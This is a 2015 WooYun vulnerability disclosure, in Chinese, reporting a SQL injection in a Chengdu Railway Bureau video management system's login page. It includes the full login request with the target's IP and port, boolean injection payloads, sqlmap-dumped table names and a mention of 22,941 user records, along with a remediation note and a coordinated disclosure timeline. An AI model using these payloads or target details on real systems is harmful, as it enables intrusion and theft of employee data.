当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0137108

漏洞标题:成都铁路局某系统存在sql注入漏洞可泄漏2万多员工信息

相关厂商:成都铁路局

漏洞作者: 小歪

提交时间:2015-08-28 16:47

修复时间:2015-10-12 16:18

公开时间:2015-10-12 16:18

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-28: 细节已通知厂商并且等待厂商处理中
2015-08-28: 厂商已经确认,细节仅向厂商公开
2015-09-07: 细节向核心白帽子及相关领域专家公开
2015-09-17: 细节向普通白帽子公开
2015-09-27: 细节向实习白帽子公开
2015-10-12: 细节向公众公开

简要描述:

成都铁路局某系统登录页存在sql注入漏洞,可泄漏2万多员工信息

详细说明:

成都铁路局某音视频管理系统,在登录页存在sql注入漏洞,另没有验证码及其他防护,可进行暴力破解,此内容未单独进行测试。
登录页提交内容为:

POST /admin/userLogin.do HTTP/1.1
Host: 123.71.192.123:8085
Proxy-Connection: keep-alive
Content-Length: 41
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://123.71.192.123:8085
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.115 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://123.71.192.123:8085/admin/userLogin.do
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=00F0E287607823B395DCB8AB75399A33
Connection: close
user.loginName=admin&user.password=123456


其中post参数存在sql注入漏洞

admin' AND 1=1 AND 'a'='a

提示密码错误

admin' AND 1=2 AND 'a'='a

提示用户不存在
使用sqlmap进行测试,可查看当前库多个表

+--------------------------+
| lavdr                    |
| ocp_admin_privileges     |
| t_attach                 |
| t_attach_group           |
| t_camera_file            |
| t_car_video              |
| t_dispatch_dictionary    |
| t_file                   |
| t_file_log               |
| t_line                   |
| t_line_railway_station   |
| t_live_record            |
| t_log                    |
| t_monitor                |
| t_organization           |
| t_person_info            |
| t_personjob              |
| t_railway_station        |
| t_record_device          |
| t_record_device_1        |
| t_record_dianwu          |
| t_role                   |
| t_role_permission        |
| t_six_a                  |
| t_time_record            |
| t_time_record_dictionary |
| t_unit                   |
| t_unit_station           |
| t_user                   |
| t_user_permission        |
| t_user_role              |
| t_user_theme             |
+--------------------------+

漏洞证明:

测试为后台数据库为mysql

tttt1.jpg


查看当前数据库

tttt2.jpg


跑表

+--------------------------+
| lavdr                    |
| ocp_admin_privileges     |
| t_attach                 |
| t_attach_group           |
| t_camera_file            |
| t_car_video              |
| t_dispatch_dictionary    |
| t_file                   |
| t_file_log               |
| t_line                   |
| t_line_railway_station   |
| t_live_record            |
| t_log                    |
| t_monitor                |
| t_organization           |
| t_person_info            |
| t_personjob              |
| t_railway_station        |
| t_record_device          |
| t_record_device_1        |
| t_record_dianwu          |
| t_role                   |
| t_role_permission        |
| t_six_a                  |
| t_time_record            |
| t_time_record_dictionary |
| t_unit                   |
| t_unit_station           |
| t_user                   |
| t_user_permission        |
| t_user_role              |
| t_user_theme             |
+--------------------------+


查看t_user表内容,可以看到用户有22941条内容,数据太多,就不浪费时间了。

tttt4.jpg


仅使用普通用户登录证明一下

tttt5.jpg


wooyun猜想:如果使用admin账户登录,功能是不是更多,会不会拿到shell,会不会系统提权。有兴趣可以告诉我密码~~~

修复方案:

堵住sql注入
另外,验证码也加入,错误提示模糊一些便好了。

版权声明:转载请注明来源 小歪@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-08-28 16:16

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给四川分中心,由其后续协调网站管理单位处置。

最新状态:

暂无